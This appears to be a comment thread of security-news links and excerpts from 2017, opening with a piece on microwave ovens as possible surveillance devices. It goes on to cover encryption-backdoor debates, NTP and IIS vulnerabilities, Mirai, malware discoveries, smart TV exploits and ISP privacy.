Surveillance has played a prominent role in successful military campaigns, but less so in political campaigns—although members of the current U.S. administration may beg to differ. News reports of wiretapped phone lines and microwave ovens used as listening devices suggest an uncomfortable level of paranoia in the executive branch, not to mention a disquieting disconnect from the realities of modern RF/wireless technologies.
Microwave ovens probably represent the first encounter with microwave technology for most people.
Performing surveillance requires some kind of tracking or listening device, like a wireless microphone hidden in a room. Or, if left unattended and unnoticed, the microphone embedded in a laptop computer could provide similar engress. Using popular wireless technologies such as Bluetooth or Wi-Fi, either example could be used for simple audio surveillance, transmitting a digital version of the “wiretapped” conversation to an unseen listener.
Could a microwave oven operate as a surveillance device? Possibly…if it’s properly equipped. As mentioned above, a microwave oven operates at 2.45 GHz—coincidentally, in the same unlicensed Industrial, Scientific, and Medical (ISM) frequency range as Bluetooth and Wi-Fi. But it is not modulated for communications purposes
A microwave oven could potentially operate as a transmitter, if modulated and if connected to an antenna.
Certainly, a microwave oven could be designed for surveillance (as well as for cooking).
Tomi Engdahl says:
UW professor: The information war is real, and we’re losing it
http://www.seattletimes.com/seattle-news/politics/uw-professor-the-information-war-is-real-and-were-losing-it/
A University of Washington professor started studying social networks to help people respond to disasters. But she got dragged down a rabbit hole of twitter-boosted conspiracy theories, and ended up mapping our political moment.
Starbird argues in a new paper, set to be presented at a computational social-science conference in May, that these “strange clusters” of wild conspiracy talk, when mapped, point to an emerging alternative media ecosystem on the web of surprising power and reach.
Tomi Engdahl says:
Someone is putting lots of work into hacking Github developers
Dimnie recon trojan has flown under the radar for three years… until now.
https://arstechnica.com/security/2017/03/someone-is-putting-lots-of-work-into-hacking-github-developers/
Tomi Engdahl says:
Europe’s justice ministers unsure on whether to push for decrypt law
https://techcrunch.com/2017/03/29/europes-justice-ministers-unsure-on-whether-to-push-for-decrypt-law/?ncid=rss&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Techcrunch+%28TechCrunch%29&utm_content=FaceBook&sr_share=facebook
European justice and home affairs ministers are putting their heads together to try to decide on a collective response to Internet companies’ use of strong encryption.
And, ultimately, whether to push for legislation requiring backdoors in end-to-end encryption to afford the region’s law enforcement agencies access to user data on-demand.
Last summer home affairs ministers from France and Germany called for a law to enable courts to demand Internet companies decrypt data on request.
Their call was repeated earlier this week by UK Home Secretary, Amber Rudd, who said intelligence services must be able to access readable data from apps such as end-to-end encrypted WhatsApp, asserting: “There should be no place for terrorists to hide.”
As is typically the case when politicians denounce technology companies’ use of encryption, Rudd was speaking in the wake of a terror attack.
Encryption technology has been the scapegoat of choice for Western politicians responding to terrorist attacks for multiple years now, despite governments also operating vast, dragnet digital surveillance programs.
Yesterday EU Justice Commissioner Vera Jourova also touched on the topic of encrypted apps
A Euractiv report of her comments suggests the EC has already made up its mind to put forward measures this summer — aimed at forcing what she described as a “swift, reliable response” from encrypted apps when asked to hand over decrypted data.
However a Commission spokeswoman told TechCrunch that no decisions have been made about how to approach encryption at this stage, adding that discussions are not yet “very advanced”.
On encryption the discussions are still ongoing. And for now there’s no legislative plan.
But the question of whether EU lawmakers intend to push to require Internet companies such as WhatsApp to effectively backdoor their end-to-end encryption remains an open-ended one.
“Yesterday all the ministers agreed that this is an issue and that criminal justice in cyberspace is being challenged by this
Indeed, the UK has already legislated to be able to demand decryption on request and block use of e2e encryption in the Investigatory Powers Act
But the issue is very, very complex in the sense that matters of national security are also Member State competence so there’s no competence at the EU level.
The EU’s anti-terrorism coordinator, Gilles de Kerchove, previously discussed this notion of balance, telling Euractiv: “We need a very strong internet — we don’t want to create vulnerabilities”
“The question is, can you open a backdoor for Europol only, or would that at the same time create a vulnerability and open a backdoor for the Russian mafia or third party state spies? This is part of the discussion but we are not there yet. There is internal work — it’s a tricky issue,” de Kerchove added.
Tomi Engdahl says:
How to Improve Your Chances of Staying Out of the Insider Threat Headlines
http://www.securityweek.com/how-improve-your-chances-staying-out-insider-threat-headlines
Insider Threats Are a Fact of Life and Are Not Going Away.
The continuous headlines of data breaches and leaks caused by insiders, in both the private and public sectors, starts to feel like a broken record. Combatting insider threats is one of the greatest cyber challenges facing organizations today. They are stuck between a rock and a hard place, needing to give people access to valued information and systems to do business but also making the organization vulnerable to a potential compromise if any one of those people missteps. Access implies an inherent level of trust between employer and employee, or client and vendor. The written or unwritten contract between the parties is that access is being provided for the individuals to do their jobs, and they in turn will not use it for anything outside those boundaries.
A few questions regarding this setup present themselves right off the bat. Does the insider understand their responsibilities when it comes to protecting the information and systems they are accessing? Do they understand what is required to live up to those responsibilities? Are they provided with the tools to execute their jobs while still living up to those responsibilities? Are they working in a protected environment, like an office, or in an exposed environment, like at a coffee shop? What is the inherent risk of the person being provided access? Are they committed to the company? Do they have any personal characteristics that would drive them to compromise the company?
There are also ongoing operational challenges such as making sure that everybody only has the level of access required to do their jobs, and that privileged access is limited and monitored. Finally, how do you detect an insider threat and stop them before they do damage?
Unfortunately, it takes time and effort to minimize exposure to insider threats.
Tomi Engdahl says:
Audit Finds Over a Dozen NTP Vulnerabilities
http://www.securityweek.com/audit-finds-over-dozen-ntp-vulnerabilities
Researchers at Germany-based security firm Cure53 have conducted a 32-day audit of the Network Time Protocol (NTP) and the NTPsec project and discovered more than a dozen vulnerabilities.
Cure53 has published separate reports focusing on the NTP and NTPsec problems.
The Network Time Foundation addressed the flaws earlier this month with the release of ntp-4.2.8p10.
Cure53 has classified one vulnerability as being critical. CVE-2017-6460, which only affects NTP, has been described as a stack-based buffer overflow that can be triggered by a malicious server when a client requests the restriction list. The flaw can be exploited to cause a crash and possibly to execute arbitrary code.
The security holes rated by Cure53 as high severity are CVE-2017-6463 and CVE-2017-6464, both of which can be exploited for DoS attacks.
Ntp-4.2.8p10 patches a total of 15 vulnerabilities and also includes just as many non-security fixes and improvements.
Tomi Engdahl says:
Pentest-Report NTP 01.2017
https://cure53.de/pentest-report_ntp.pdf
Tomi Engdahl says:
As Malware Gets Smarter, Bare Metal Analysis Can Keep You Secure
http://www.securityweek.com/malware-gets-smarter-bare-metal-analysis-can-keep-you-secure
They say a rising tide lifts all boats; unfortunately, the proverb applies to cybercriminals, too. While the inexpensive availability of compute processing power and broadband connectivity has made technologies like virtualization and cloud computing possible, that same ready access makes it possible for even a novice cybercriminal to leverage some of the most advanced malware available today.
All it takes is a laptop, a Bitcoin account, and a willingness to break the law; and anyone can purchase, rent or even download – for free – advanced malware that, even as of a few months ago, wasn’t available. And if the aspiring criminal doesn’t have the ability to use the malware to conduct the attack himself or herself, that person can simply hire the services of a hacker-for-hire.
This is particularly disturbing in light of the fact that advanced malware can increasingly avoid detection by threat intelligence researchers and malware analysis tools.
Tomi Engdahl says:
Millions of Websites Affected by IIS 6.0 Zero-Day
http://www.securityweek.com/millions-websites-affected-iis-60-zero-day
More than 8 million websites could be exposed to a buffer overflow vulnerability in Internet Information Services (IIS) 6.0 that has been exploited in the wild since July 2016, researchers warn.
The bug was found in the ScStoragePathFromUrl function of the Web Distributed Authoring and Versioning (WebDAV) service in Windows Server 2003 R2’s IIS 6.0. The issue, tracked as CVE-2017-7269, resides in the improper validation of an ‘IF’ header in a PROPFIND request and could allow an attacker to cause denial of service or to run arbitrary code.
Tomi Engdahl says:
New Mirai Variant Unleashes 54-Hour DDoS Attack
http://www.securityweek.com/new-mirai-variant-unleashes-54-hour-ddos-attack
New Variant of Infamous IoT Botnet Launches Attack Against Network of U.S. College
A newly discovered variant of the Mirai botnet was responsible for powering a 54-hour distributed denial of service (DDoS) attack, Imperva researchers reveal.
Mirai was one of the most discussed Internet of Things (IoT) botnets during the second half of last year, after it was used in two large attacks against Brian Krebs’ blog and DNS provider Dyn. In October, the Trojan’s source code leaked online and new variants emerged soon after.
One such version emerged in December when TalkTalk Telecom home routers were being infected via a vulnerability in the network router protocol. Earlier this year, researchers observed a Windows variant of Mirai, though concluded that it was mainly designed to spread the Linux Trojan to more IoT devices.
On Feb. 28, the new Mirai threat was used to launch a DDoS attack against a US college, and researchers say that the assault continued for 54 hours straight. The average traffic was of over 30,000 requests per second (RPS) and peaked at around 37,000 RPS, the highest of any Mirai botnet (the attack generated a total of over 2.8 billion requests).
Tomi Engdahl says:
The Power and Importance of Peer Review
http://www.securityweek.com/power-and-importance-peer-review
As a Security Professional, If You’re Not Having Your Work Peer Reviewed You’re Not Doing it Right.
Earlier in my career I bought into the notion that the ultimate goal of one’s career was to be the smartest person in the room. That being the smartest, or at least having people believe you were the smartest, was the pinnacle of it all. I’m happy to admit that I’ve since learned better. There are many bad things about thinking that way – you alienate peers by design, you fear discourse and analysis of your ideas, and you always have to keep playing the provocateur. Frankly it’s miserable and exhausting.
This is the reason that I’ve focused the last few years of my career on building a group that researches, channels and organizes knowledge for the betterment of the collective. There is a lot of amazing tribal knowledge out there – lots of very smart people with something to share but without a voice. Aggregating these ideas, forcing them to compete with each other in a positive way and fostering collaboration is an amazing job. Those who have worked with me recently will recall me saying how important it is to stay humble and to seek out those with brilliant minds to aggregate all that available knowledge and feed it back. The aggregate is truly much more powerful than its piece parts.
I’m not trying to be your Yoda, but I’m sure you can look around and recognize how far out of the mainstream ideas like peer review have fallen. Egos are king and everyone is an expert. Just ask them.
Tomi Engdahl says:
This Stealthy Malware Remained Unnoticed for Three Years
http://www.securityweek.com/stealthy-dimnie-malware-remained-unnoticed-three-years
Stealthy command and control methods allowed a newly discovered malware family to fly under the radar for more than three years, Palo Alto Networks security researchers reveal.
Dubbed Dimnie, the threat was discovered in mid-January 2017, when it was targeting open-source developers via phishing emails. An attached malicious .doc file contained embedded macro code that executed a PowerShell command to download and execute a file.
The first samples pertaining to this malware family dated back to early 2014, but the use of stealthy command and control (C&C) methods, combined with a Russian-focused target base helped the threat remain unnoticed until this year. Dimnie, which attempted a global reach with its January 2017 campaign, is capable of downloading additional malware and stealing information from compromised systems.
Tomi Engdahl says:
Security vs. Quality: What’s the Difference?
http://www.securityweek.com/security-vs-quality-what%E2%80%99s-difference
Quality and security. Two words that share an interesting relationship and no small amount of confusion.
What is certain is that both words are meaningful in the context of software. Quality essentially means that the software will execute according to its design and purpose. Security means that the software will not put data or computing systems at risk of unauthorized access. While quality seems to be easier to measure, both are somewhat subjective in their assessment.
The real confusion comes when you consider the relationship between quality and security. Are they the same thing or is one a subset of the other? If I have quality, does that mean I’m also secure? Are quality problems also security problems or vice versa?
Defining quality and security defects
For those who take a holistic view of software design and development, quality and security issues both fall into the broad category of defects.
Applying the definition of “defect”, the software malfunctioned or failed in its purpose. This would be a defect and would fall into the category of quality.
Determining if the defect has a security component will take more digging. If I can demonstrate that exploiting this issue in some way to gain unauthorized access to data or the network, then this would also fall under the category of security. It is entirely possible that the defect may simply be a logic issue and, while potentially annoying, does not create an exploitable vulnerability.
Based on my scenario above, we can then draw the conclusion that security is a subset of quality.
Or maybe not.
Clarifying the misunderstandings between quality and security
A simple coding bug such as cross-site scripting (XSS) may counter our argument. The developer can code the software within adherence to the requirements and still make the code vulnerable to an XSS attack. The associated defect would be security related, but does reflect a defect from a quality point of view. Many would argue that a security vulnerability is a quality problem. I could easily get behind that line of reasoning, but others would invoke the stricter interpretation. This disabuses the notion that security is a subset of quality.
Part of the misunderstanding between quality and security was that the two were functionally separated in traditional development shops, and the groups that owned them rarely interacted.
Combining quality and security to enable the developer
As development practices have evolved and agile methods continue to take root, the traditional quality and security silos have had to come down by necessity. Security is being integrated into the development process with the notion of enabling developers to build good security practices into their code. Similarly, the responsibility for quality is now shared by the developers. There is also higher awareness of the architecture, design, and requirements process and how that process affects quality and security.
Broadening the quality and security perspective
In the end, quality and security are critical components to a broader notion: software integrity.
Ultimately, developers strive to develop the best software possible. This implies that defects—quality and security—should be minimalized, or, at best, eliminated. If we agree that quality and security problems are both a form of defect, then we must sufficiently address both to produce software of the highest integrity.
Tomi Engdahl says:
US-CERT’s Warning on SSL Interception vs. Security is a False Dichotomy
http://www.securityweek.com/us-certs-warning-ssl-interception-vs-security-false-dichotomy
Other times, the nuance of a complicated issue gets lost in a headline that’s meant to scare—especially in infosec journalism. I’m thinking specifically of the coverage around the US CERT warning TA17-075A “HTTPS Interception Weakens TLS Security.” Reading a headline like “US Gov Backs Google’s Alarm: Warns Against HTTPS Interception Products,” you’d think that SSL interception is working against security, right? The CSO article reports on what Google says about what CERT says about a paper published on the quality of SSL interceptors called “The Security Impact of HTTPS Interception.”
If you barely followed that last sentence, let me boil away the tallow for you.
At issue is the use of transparent SSL/TLS interception devices that spoof the endpoint of the server in order to sit as a man in the middle between a client (typically a browser) and an HTTPS web server. These interception devices are installed in enterprise and government agency data centers to allow the local security team to inspect what’s going into and out of the network. The paper, and the CERT warning, point out that many of these SSL interception devices do SSL poorly. But that doesn’t mean the only choice is not to use them or that they’re not needed.
The essence of this false dichotomy is that it completely ignores the question of why the interception is happening in the first place: security inspection.
Certificate Verification Fallacies
Classic SSL interceptors are notoriously lackadaisical about certificate verification. Historically, this comes from the fact that everyone used to be lackadaisical about certificates and certificate chains. And if an executive couldn’t get to his or her March Madness bracket because of a certificate chain error, which may or may not have been an error at the server, the SSL interceptor was the first thing to blame. So SSL interceptor vendors never really had a requirement to be too strict because their job was to provide visibility, not privacy, to the IT administrators.
The “Security Impact of HTTPS Interception” paper quantified all these fallacies
Inconvenient Truth: SSL Interception Is Still a Kludge
Acccording to the “Security Impact…” paper, SSL interceptor vendors’ attempts to get a TLS extension that would provide a safer, sanctioned means of interception “have been met with great hostility within the standards groups.”
To be charitable, one could say that the IETF TLS standards group is not in favor of such an extension because any official back door could quickly become an unofficial back door and besides, “We’re trying to build a more secure internet!” But in reality, the current IETF group, bless their hearts, come from academia or organizations like Google, Cloudflare, and Akamai, who have an interest in securing their own stuff and aren’t in the business of securing other people’s. Some of them have little idea what a modern enterprise security architecture looks like.
What’s the Fix?
Consensus for the value of interception looks further away than ever with Google, Cloudflare, and Akamai driving the standards committee for TLS 1.3. In the meantime, is there anything a security architect can do today?
The conclusion of the CERT warning says “Organizations using an HTTPS inspection product should verify that their product properly validates certificate chains and passes any warnings or errors to the client.”
The badssl.com website listed in the paper and the CERT warning is actually a pretty nifty tool to see at a glance how well your interceptor is doing at forwarding your TLS. It makes the bad transparent TLS proxy a lot less transparent.
Tomi Engdahl says:
Security co-operation unlikely to change post Brexit, despite threats
‘Messy divorce’ would help no one
https://www.theregister.co.uk/2017/03/30/security_co_operation_post_brexit_europe/
UK Prime Minister Theresa May is warning that failure to negotiate an agreement on Britain’s exit from the European Union could damage security cooperation. The tough line – contained in Wednesday’s historic letter triggering Article 50 – has re-focused minds on the possible security implications of Brexit.
“In security terms a failure to reach agreement would mean our cooperation in the fight against crime and terrorism would be weakened,” the prime minister warned.
The UK’s main national security and intelligence sharing partners are fellow members of NATO and members of the Five Eyes alliance (US, Canada, Australia, NZ), respectively. Neither of those arrangements is going to be affected by Brexit. In addition, France and Britain co-operate on defence outside the EU under the Lancaster House Treaty.
How co-operation on cybercrime across Europe might work post Brexit is less settled. Europol, the pan-EU policing agency headquartered in The Hague, is an EU institution. That means the UK won’t be on the board at Europol post-Brexit, for one thing. Some affiliate status with Europol is possible however the risk exists that the UK will be “cut off” from the “full intelligence picture” after Brexit.
Tomi Engdahl says:
The source code for a new banking Trojan dubbed Nuclear Bot was leaked online, experts speculate a rapid diffusion of the threat in the wild.
http://securityaffairs.co/wordpress/57541/malware/nuclear-bot-source-code.html
Tomi Engdahl says:
Internet Noise cycles through random websites to protest snooping ISPs
http://www.theverge.com/2017/3/30/15127360/internet-noise-browsing-tool-advertising-isp
This week, Congress voted to allow internet service providers to sell users’ web browsing histories, rolling back FCC rules passed under the Obama administration. Activists have already roundly criticized the vote as a win for a telecom industry eager to help sell targeted ads.
Built by technologist Dan Schultz, a tool called Internet Noise will send random searches through a browser window, introducing some chaos to the tracking and ad-profiling process.
As Schultz notes on the website for the tool, Internet Noise is a form of protest (and even a fun spin through weirder corners of the web), but it is emphatically not a way to shield your personal privacy on the internet. The website won’t be too disruptive to an advertising profile, especially if you’re still spending the majority of your time with your usual browsing habits.
if you’re interested in a more effective approach, consider a VPN.
Internet Noise
https://slifty.github.io/internet_noise/index.html
Click this button, and your browser will start passively loading random sites in browser tabs. Leave it running to fill their databases with noise. Just quit your browser when you’re done.
Tomi Engdahl says:
Pornhub And YouPorn Are Adding Support for HTTPS Encryption
https://motherboard.vice.com/en_us/article/pornhub-youporn-privacy-https-encryption
Porn sites need to have good security. Hackers have repeatedly targeted such sites and made off with user data, including usernames and passwords.
But, although it’s not a totally mutually exclusive concept, porn sites should consider the privacy of their users too. On Thursday, both Pornhub and YouPorn announced they were switching on HTTPS on their websites, which protects data in transit between users’ browsers and the sites’ servers.
“With this Internet communication protocol we can ensure not only the security of our platform, but also that of our users,”
HTTPS provides several different benefits: it can protect data entered into a web page, such as passwords, meaning that if a hacker is sitting on the same network as you, they’ll be unable to read any intercepted sensitive info. HTTPS may also help users be a bit more sure they are visiting the genuine Pornhub or YouPorn instead of an imposter site, perhaps designed to deliver malware or steal login credentials.
“As one of the most viewed websites in the world, it is our duty to ensure the confidentially and safety of our users,”
Tomi Engdahl says:
Learn about the new Google sign-in page
In the next few weeks, the page to sign in to your Google Account will look a little different.
https://support.google.com/accounts/answer/7338427?visit_id=0-636264690998853656-1477068202&p=signin_newlook&rd=1
Tomi Engdahl says:
Russia ‘actively involved’ in French election, warns US Senate intelligence chief
http://m.france24.com/en/20170330-russia-actively-involved-french-election-warns-us-senate-intelligence-chief
The head of the powerful Senate Intelligence Committee warned Wednesday that Russia is interfering in the French election just as it did in the US presidential campaign last year.
Tomi Engdahl says:
How To Set Up A VPN After Congress Voted To Sell Your Online Data
http://www.iflscience.com/technology/how-to-set-up-a-vpn-after-congress-voted-to-sell-your-online-data/
Earlier this week week, Congress voted to repeal Internet privacy restrictions. Once Trump signs it, which he is expected to do, it will strip away the online privacy rights of American citizens, allowing companies to buy your data.
Understandably, this has led people to start considering setting up Virtual Private Networks (VPNs). If you value your privacy, you may want to do the same.
Tomi Engdahl says:
Asha McLean / ZDNet:
IBM X-Force report: Over 4B personal records leaked online in 2016, up 566% YoY; hackers increasingly targeting unstructured data such as email archives, IP
Leaked records up 566 percent to 4 billion in 2016: IBM Security
http://www.zdnet.com/article/leaked-records-up-566-percent-to-4-billion-in-2016-ibm-security/
A report from Big Blue’s security arm has found that the number of records compromised grew by 566 percent in 2016 to more than 4 billion.
Tomi Engdahl says:
Researcher Says 9 in 10 Smart TVs Vulnerable to Broadcast-based Attacks
https://securityledger.com/2017/03/researcher-says-9-in-10-smart-tvs-vulnerable-to-broadcast-based-attacks/
In-brief: a security researcher demonstrated a broadcast-based attacks on smart televisions, almost three years after a similar demonstration by researchers at Columbia. More than 90 percent of smart TVs may be vulnerable – but carrying out an attack may be challenging.
Tomi Engdahl says:
IoT Security News — Detection Improves, But Gaps Remain
https://www.securerf.com/iot-security-news-detection-improves-gaps-remain/?utm_campaign=Email%20Newsletter&utm_source=hs_email&utm_medium=email&utm_content=49711299&_hsenc=p2ANqtz-_W9BxmMIbKvZwO7opdEegua07PIKwphTjcMUDdRXX1nN802MxA2pq5OCnd7ssoLfx_GPv2Fm4LlodLxN_SO_skzv7kr1fF0R8N1CERdtxuV2BnADQ&_hsmi=49739146
While IoT security hacks and ransomware attacks have been on the rise, the ability to detect attacks and take remedial action has improved. As evidenced by the IoT-security news items below, IT security staff can spot some types of attacks during or immediately after they occur – but in some cases, even the most stringent precautions are no match for determined hackers.
Toy Hack via IoT Is No Child’s Play
Surveillance Cameras Hacked Days Before Presidential Inauguration
University’s IoT Devices Used Against Its Network
To prevent these and other types of attacks from occurring, IoT devices must be secured with strong authentication and data protection solutions.
Tomi Engdahl says:
Dan Goodin / Ars Technica:
Remote exploit, successfully demoed on two fully-updated Samsung smart TV models in Feb., compromises TVs via maliciously-crafted digital video broadcast signal — Demo exploit is inexpensive, remote, scalable—and opens door to more advanced hacks. — A new attack that uses terrestrial radio signals …
Smart TV hack embeds attack code into broadcast signal—no access required
Demo exploit is inexpensive, remote, scalable—and opens door to more advanced hacks.
https://arstechnica.com/security/2017/03/smart-tv-hack-embeds-attack-code-into-broadcast-signal-no-access-required/
A new attack that uses terrestrial radio signals to hack a wide range of Smart TVs raises an unsettling prospect—the ability of hackers to take complete control of a large number of sets at once without having physical access to any of them.
The proof-of-concept exploit uses a low-cost transmitter to embed malicious commands into a rogue TV signal. That signal is then broadcast to nearby devices. It worked against two fully updated TV models made by Samsung. By exploiting two known security flaws in the Web browsers running in the background, the attack was able to gain highly privileged root access to the TVs. By revising the attack to target similar browser bugs found in other sets, the technique would likely work on a much wider range of TVs.
“Once a hacker has control over the TV of an end user, he can harm the user in a variety of ways,” Rafael Scheel, the security consultant who publicly demonstrated the attack, told Ars. “Among many others, the TV could be used to attack further devices in the home network or to spy on the user with the TV’s camera and microphone.”
Tomi Engdahl says:
Hackers Are Emptying ATMs With a Single Drilled Hole and $15 Worth of Gear
https://www.wired.com/2017/04/hackers-emptying-atms-drill-15-worth-gear/
Researchers from the Russian security firm Kaspersky on Monday detailed a new ATM-emptying attack, one that mixes digital savvy with a very precise form of physical penetration. Kaspersky’s team has even reverse engineered and demonstrated the attack, using only a portable power drill and a $15 homemade gadget that injects malicious commands to trigger the machine’s cash dispenser.
Tomi Engdahl says:
Android Ransomware Employs Advanced Evasion Techniques
http://www.securityweek.com/android-ransomware-employs-advanced-evasion-techniques
A newly discovered Android ransomware family employs heavy obfuscation and delayed activation of malicious functionality to ensure it can evade anti-virus solutions, Zscaler security researchers warn.
The malware was found hidden inside the repackaged Russian entertainment social network app OK, which the malware author disassembled to insert malicious code, researchers say. The good news, however, is that the legitimate variant of OK, which has over 50 million downloads in Google Play, hasn’t been compromised.
The first evasion technique leveraged by the mobile threat involves kicking off the malicious activity four hours after the initial installation. Most detection mechanisms expect malware to immediately start operation, meaning that this ransomware won’t be immediately detected.
After the four hours have passed, however, users are prompted to activate device administrator rights for the application. Users can’t dismiss the activation screen and clicking the “Cancel” button won’t help either, because the screen is immediately re-displayed until admin rights are enabled, the security researchers reveal.
Tomi Engdahl says:
Fake Flash Player Ads in Skype Lead to Malware
http://www.securityweek.com/fake-flash-player-ads-skype-lead-malware
Skype users appear to have been targeted in a recent malvertising campaign that was aggressively pushing malware hidden behind a fake Flash Player package.